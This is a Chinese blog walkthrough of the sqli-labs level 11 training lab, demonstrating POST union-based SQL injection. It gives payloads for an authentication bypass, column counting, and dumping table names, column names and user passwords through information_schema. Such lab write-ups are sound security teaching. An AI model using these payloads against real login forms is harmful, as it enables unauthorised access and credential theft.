当前位置: 首页 > news >正文

sqli-labs第十一关——‘POST联合查询

这一关用hackbar来判断

一:判断注入类型

通过查看页面源代码我们知道两个输入框名分别是uname和passwd

uname=1&passwd=
uname=1'&passwd=
uanme=1"&passwd=

观察页面,只有单引号闭合的产生报错回显 

判断闭合类型为单引号字符型;

uname=1' or '1'='1'#&passwd=1234

 布尔验证一下

 成功登录,闭合类型是单引号字符型

二:开始注入 

1.判断列数

uname=1' order by 2#&passwd=1234

只有两列,数到第三列的时候报错

2.爆数据库名

uname=1' union select 1,database()#&passwd=1234

3.爆所有的表名

uname=1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#&passwd=1234

4.爆所有的列名

uname=1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'#&passwd=1234

 5.爆数据

uname=1' union select 1,group_concat(username,0x3a,password) from users#&passwd=1234

❀❀❀ 完结撒花!! ❀❀❀ 

http://www.dtcms.com/a/203266.html

相关文章:

  • 【Bluedroid】蓝牙HID Device virtual_cable_unplug全流程源码解析
  • deepseek梳理java高级开发工程师es面试题
  • 【SFT监督微调总结】大模型SFT全解析:从原理到工具链,解锁AI微调的核心密码
  • 通过改进模型减少过拟合现象的技术文档
  • [luogu12543] [APIO2025] 转杆 - 构造 - 贪心
  • 面试之MySQL慢查询优化干货分享
  • Vue video播放视频流
  • 数据实时同步:inotify + rsync 实现数据实时同步
  • 网络安全之带正常数字签名的后门样本分析
  • 设计模式 - 工厂模式
  • Linux:库与链接
  • PostGIS栅格数据类型解析【raster】
  • 通过 API 获取 1688 平台店铺所有商品信息的完整流程
  • 查看mysql配置文件my.cnf的位置
  • 小土堆pytorch--神经网路-卷积层池化层
  • C++中String类
  • JavaScript的Button的contentItem属性
  • 销售易史彦泽:从效率工具到增长引擎,AI加速CRM不断进化
  • 家电行业数字化实践案例 | 易趋携手某知名家电集团打造数字化项目管理系统
  • msq基础
  • Python 包管理工具 uv
  • 以太网口16路数字量DI输入采集模块 Modbus TCP协议
  • SkyReels-V2:开启无限时长电影生成新时代
  • [创业之路-369]:企业战略管理案例分析-8-战略制定-战略制定起点:差距分析
  • Visual Studio 2022 插件推荐
  • 张 推进对话式心理治疗:SOULSPEAK的聊天机器人
  • pytorch小记(二十四):PyTorch 中的 `torch.full` 全面指南
  • 每日算法刷题Day11 5.20:leetcode不定长滑动窗口求最长/最大6道题,结束不定长滑动窗口求最长/最大,用时1h20min
  • python-leetcode 69.最小栈
  • YOLO中model.predict方法返回内容Results详解